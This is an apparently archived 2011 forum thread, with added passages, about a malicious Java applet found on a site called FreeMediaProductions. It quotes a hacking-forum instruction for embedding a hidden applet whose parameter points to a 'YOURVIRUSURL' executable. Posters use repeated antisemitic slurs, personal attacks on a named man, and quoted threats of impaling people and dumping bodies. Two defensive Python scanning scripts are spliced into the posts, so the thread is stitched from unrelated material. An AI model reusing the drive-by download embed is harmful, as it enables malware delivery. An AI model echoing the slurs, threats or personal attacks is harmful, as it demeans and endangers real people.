Don't go to FMP (this means even with a proxy)
Macrobius
08-22-2011, 05:36 AM
http://beer.weremight.com/forums/showthread.php?8215-Use-Caution-Approaching-FreeMediaProductions.info
They have a java applet on their front page http:// + freemediaproductions.info
It refers to http:// + java.nfshost.com
Not sure what it does, but I downloaded it to a safe machine, and disassembled the Java byte code (yeah, I'm a java programmer. That's 'javap -c Client' after you run 'tar xvf Client.jar' and cd to the right directory, for all you geeks out there).
The disassembly is below.
I don't have to look further than Line 1789 to know this code is *invoking another process on your machine* (that means, trying to break out of your browser and run havoc)
1789: invokevirtual #26; //Method java/lang/Runtime.exec:(Ljava/lang/String;)Ljava/lang/Process;
If you want Daryl to do that, y'all go visit his site.
Executive summary, for non-geeks: The Half-Jew Fucker's *Up to something*.
Visit his site at your own risk. Tip o' the hat to Monster at SI for catching this one.
Notice the oddly named routine: jnf3h9go56n -- which google tells me is also available at pastebin.com (the site used by Anonymous to post things), and some place antiscool.web.com -- looks very suspicious.
... Disassembly at the link.
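The check described in the post above (reading `javap -c` output for calls that start a process) can be automated. The following is an added example, not part of the original thread or of the applet; the watch list, the `triage` helper and the sample listing are assumptions made for illustration.

```python
import re

# Illustrative watch list (an assumption, not exhaustive): calls that let an
# applet start processes, write files or pull in remote content.
WATCHLIST = {
    "java/lang/Runtime.exec": "starts an OS process",
    "java/lang/ProcessBuilder.start": "starts an OS process",
    "java/net/URL.openStream": "fetches remote content",
    "java/io/FileOutputStream.<init>": "writes a local file",
}
OFFSET = re.compile(r"^\s*\d+:")
# Accepts old ("#26; //Method ...") and new ("#26  // Method ...") javap output.
INVOKE = re.compile(
    r'^\s*(\d+):\s+invoke(?:virtual|static|special|interface)\s+#\d+[^/]*//\s*'
    r'(?:Interface)?Method\s+([\w/$]+)\.("?[\w$<>]+"?):\s*(\S.*?)\s*$'
)

def triage(javap_text):
    """Return (method, offset, callee, descriptor, reason) per watched call."""
    findings, current = [], "<unknown>"
    for line in javap_text.splitlines():
        m = INVOKE.match(line)
        if m:
            offset, cls, name, desc = m.groups()
            callee = cls + "." + name.strip('"')
            if callee in WATCHLIST:
                # Drop any whitespace a forum paste left inside the descriptor.
                desc = re.sub(r"\s+", "", desc)
                findings.append((current, int(offset), callee, desc, WATCHLIST[callee]))
        elif "(" in line and line.rstrip().endswith(";") and not OFFSET.match(line):
            current = line.strip().rstrip(";")  # javap method header line
    return findings

# Constructed listing; only the call at offset 1789 follows the line in the post.
SAMPLE = """\
public class Client extends java.applet.Applet{
public void init();
  Code:
   0: aload_0
   1: ldc #2; //String paramName
   3: invokevirtual #3; //Method getParameter:(Ljava/lang/String;)Ljava/lang/String;
public void fetchAndRun(java.lang.String);
  Code:
   1770: invokevirtual #24; //Method java/net/URL.openStream:()Ljava/io/InputStream;
   1789: invokevirtual #26; //Method java/lang/Runtime.exec: (Ljava/lang/String; )Ljava/lang/Process;
"""

if __name__ == "__main__":
    print(*triage(SAMPLE), sep="\n")
```

A hit only says where to read next: the enclosing method and offset tell you which part of the disassembly builds the argument passed to the flagged call.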
Macrobius
08-22-2011, 07:01 AM
Looks like Mr #daryl #******* #scriptkiddie has been reading teh warez...
(link to Google cache on the other odd phrase '' in his front webpage):
http://webcache.googleusercontent.com/search?q=cache:LPiUPWKa1zUJ:www.hackforums.net/archive/index.php/thread-1043289.html+AMLMAFOIEA&cd=1&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
NAME = "AMLMAFOIEA" VALUE = "YOURVIRUSURL"
AMLMAFOIEA eh? Well same to you, fucker.
Now open the folder where you saved the file. You'll see you'll have a file and a folder. Rename the file from whatever.htm to index.htm and accept any warning you may get.
Now open up index.htm in notepad. Scroll down to the very bottom of the page, make a new line and add this text:
Code:
<APPLET CODE = "Client.class" ARCHIVE = "Client.jar" WIDTH = "0" HEIGHT = "0">
<PARAM NAME = "AMLMAFOIEA" VALUE = "YOURVIRUSURL">
</APPLET>
Replace "YOURVIRUSURL" with the link to your .exe virus.
.exe would seem to be primarily targeting Windows (Microsoft) systems.
His descent into #dontemploydarylbasarab (http://www.google.com/search?q=%23dontemploydarylbasarab&ie=utf-8&oe=utf-8&aq=t) unemployability seems to be palpable now. He's seeding a website, under his IRL name, with known malware.
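For anyone reviewing a saved copy of a page for the kind of embed quoted in the post above, the following added example (not part of the original thread) lists applet tags that are zero-size, load their archive from another host, or carry a PARAM pointing at an executable. The `AppletScanner` and `review` names and the sample hosts are assumptions; the archive is resolved against CODEBASE when present, otherwise against the page URL.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

class AppletScanner(HTMLParser):
    """Collect <applet> tags and their <param> children from saved HTML."""
    def __init__(self, page_url):
        super().__init__()
        self.page_url, self.found, self._open = page_url, [], None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}  # names arrive lowercased
        if tag == "applet":
            cb = a.get("codebase", "")
            base = urljoin(self.page_url, cb + "/" if cb and not cb.endswith("/") else cb)
            self._open = {"archive": urljoin(base, a.get("archive", "")),
                          "hidden": "0" in (a.get("width"), a.get("height")),
                          "params": {}}
            self.found.append(self._open)
        elif tag == "param" and self._open is not None:
            self._open["params"][a.get("name", "")] = a.get("value", "")

    def handle_endtag(self, tag):
        if tag == "applet":
            self._open = None

def review(html, page_url):
    """Return [(archive_url, [reasons])] for applets that deserve a closer look."""
    scanner = AppletScanner(page_url)
    scanner.feed(html)
    report = []
    for ap in scanner.found:
        reasons = []
        if ap["hidden"]:
            reasons.append("zero-size applet")
        if urlsplit(ap["archive"]).netloc != urlsplit(page_url).netloc:
            reasons.append("archive served from another host")
        for name, value in ap["params"].items():
            if urlsplit(value).path.lower().endswith((".exe", ".scr", ".bat")):
                reasons.append(f"param {name} points at an executable")
        if reasons:
            report.append((ap["archive"], reasons))
    return report

# Constructed page; hosts are placeholders, the PARAM name is the one in the post.
SAMPLE = """<html><body><p>news scroll</p>
<APPLET CODE="Client.class" ARCHIVE="Client.jar" CODEBASE="http://jars.example.net" WIDTH="0" HEIGHT="0">
<PARAM NAME="AMLMAFOIEA" VALUE="http://files.example.net/update.exe">
</APPLET></body></html>"""
```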
Macrobius
08-22-2011, 07:40 AM
LOL - he saw this post and took it down. Not that I didn't get the source code of the page I saw, mind you, and not that others didn't witness the attempt.
It was some lame attempt at a keystroke logger. Serious Script Kiddie stuff, pretty much what you would expect from a Half-Jew Bessarabian. Likely not even functional, as one would expect from an IT screw up who can't even hack HTML. Details at the TBB thread.
Silly Commies. Trix are for Rabbis.
Albert Dryden
08-22-2011, 05:19 PM
I got a pop-up when I visited there recently telling me the site was trying to run a javascript and did I want it to continue. All things considered, I clicked on 'no'.
Monster
08-22-2011, 09:24 PM
Would Windows XP allow the applet to download without the user's knowledge? If the applet is a key logger, how would one know if one is infected? Would an antivirus scan detect the applet on a user's computer? (Seems to me that it should.) Does anyone here think that they might have been infected?
Daryl *******, the FMP owner, claims a high volume of traffic to his website. One assumes that much of this volume comes from outside the Circle of Crust. Has he indiscriminately exposed web surfers to his applet? Is this illegal?
NowhereMan
08-22-2011, 09:32 PM
Turn him in to his ISP, the FBI, and anyone else you can think of.
After all, has he not done the same here, at the Queerbarrel, the Phora, and other places?
I think it is your DUTY to turn him in!
Street Walker Barbie
08-22-2011, 11:42 PM
Not everyone has a Kane obsession, I've never been to, or even heard of the site....
Good job monster :agree:
Joe McCarthy
08-23-2011, 12:03 AM
Not everyone has a Kane obsession
Yet enough do to make it mildly annoying for some of the rest of us.
I have a feeling Kane is one of these types of topics that goes away if people stop talking about it. I also have a feeling certain people aren't going to stop talking about it.
Monster
08-23-2011, 12:53 AM
LOL - he saw this post and took it down. Not that I didn't get the source code of the page I saw, mind you, and not that others didn't witness the attempt.
It was some lame attempt at a keystroke logger. Serious Script Kiddie stuff, pretty much what you would expect from a Half-Jew Bessarabian. Likely not even functional, as one would expect from an IT screw up who can't even hack HTML. Details at the TBB thread.
Silly Commies. Trix are for Rabbis.
Can you post the details here?
Macrobius
08-23-2011, 02:48 AM
Can you post the details here?
Kane claims he was just trying to scare somebody and there was no payload. I'm pretty sure it was botched and non-functional, and I don't have a copy of the payload (possibly there was none).
The applet was *intended* to download, without the user's consent, a file of the hacker's choosing, from the same site the applet Client.jar was hosted (java.nfshost.com -- not FMP). Going on the assumption that Kane does *not* control that virtual website and place Client.jar himself (but read about it in some hacker's forum), he would only be able *at most* to download a payload that was hosted there by someone else. The sorts of files that seem to be hosted for this purpose are, a google search will show, either keyloggers or viruses intended to infect. If Kane had chosen to configure the applet to point to a site he controlled, and *if* the applet actually functions as designed (not proven), and *if* the user had a vulnerable machine, with the java plugin, and configured to receive no warnings or chose to ignore them, then in that case the plugin would have delivered its intended payload, and that payload could be any program at all he wished to run on the victim's computer -- no restrictions as to type. The hypothesis the intent was to drop a keylogger is based on (1) the sorts of things people talk about on the net and (2) my assessment of Kane as a threat who is known to want to phish for passwords. In other words, a creepy peeping tom.
If he chose to misconfigure the applet, then it would give you an annoying message and do nothing. I give zero credence to Kane's claim he intended no harm, and do not know whether the malicious intent failed because he doesn't know how to configure it properly, or whether he is actually telling the truth. I'm willing to believe inept or disingenuous and devious, ahead of considerate and humorous. But that's just me.
What I observed, is the applet, as configured in the news scroll on Kane's front page, had the grey background of an applet drawing area -- meaning the browser parsed the html tag in full, rendered and reserved a space for it, but was unable to activate it. On my machine this would be because I do not in fact have the java plugin installed. Firefox correctly asked me if I wished to install it, and I declined. I don't believe any visitor is likely to have actually run the applet, except for persons who received an 'unable to log in message'.
My reason for believing this is I observed the PARAM configuring the applet was set to a location '../something' -- and I believe the way java applets work is they look at the base url of the jar file, unless you override that (not observed in the source code I saw). Thus, it would have tried to fetch a file from java.nfshost.com -- and I theorize that one level up from what is likely a virtual host is a working directory that is password protected, or throws some sort of error such as was observed.
In other words, I believe the attack (or prank) was misconfigured. So, there are a few possible explanations of the facts: (1) Kane got some script kiddie code to drop a keylogger on his intended victim's target machine but his cut and paste led to a misconfiguration -- I consider that the likeliest. (2) It was a prank, like he said, and 'he meant to do it' -- deliberately misconfiguring it in an odd way, that is in fact annoying. There is a remote possibility (3) That it was some HTML he posted, and it was only accidentally turned from a CODE ... /CODE tag or something like that, into an actually functioning applet on accident, by the HTML neutering code of his website, in the news scroll. The code itself was interspersed with 'HTML escaping' for proper rendering in the news feed (as it should be), but the code that does that *might* not be that smart about handling an embedded java applet, and accidentally strip out the CODE ... /CODE leaving the APPLET tag now functional by accident [I consider this technically unlikely, but mention it for completeness]. I would discard (3) because Kane hasn't claimed it was an accident. I'd say it's down to 1 or 2 and you are welcome to believe what you like.
Monster
08-23-2011, 02:55 AM
Thanks for the explanation, Mac. Well written. Even I understood it. Some of it. :)
.
http://cdn.counter-currents.com/wp-content/uploads/2011/09/Apotheosis.jpg
« Last post by Daryl ******* on September 11, 2011, 01:38:49 am »
i put it down for pennsylvania.
i put it down for transylvania.
goin to impale you from lancaster to philly
drop your bodies in bucks county like my idol richard kuklinski (he really did that),
i was called chester
the molester
as a child.
Go to chester pennsylvania, so I can start to get wild.
« Last post by Daryl ******* on September 14, 2011, 04:07:08 am »
Another particularly good looking county is Bucks County. It's a Philadelphia Suburb but it's a "long commute" suburb. It's probably my favorite suburb, but it's too far out.
Nice forests, trails, and hills.
I have a video where I searched for richard kuklinski's spots where he hid bodies in the forests of bucks county, but I have not released that video for public view.
http://www.freemediaproductions.info/Firezone/index.php?action=recent;start=10...At your own risk, of curse.
.
brother number three
09-30-2011, 07:41 PM
http://www.serialkillercalendar.com/EVERYPAGE/LEFTHANDNAV/NEW2010SERIALKILLERCALENDARLEFTSIDEBUTTON.jpg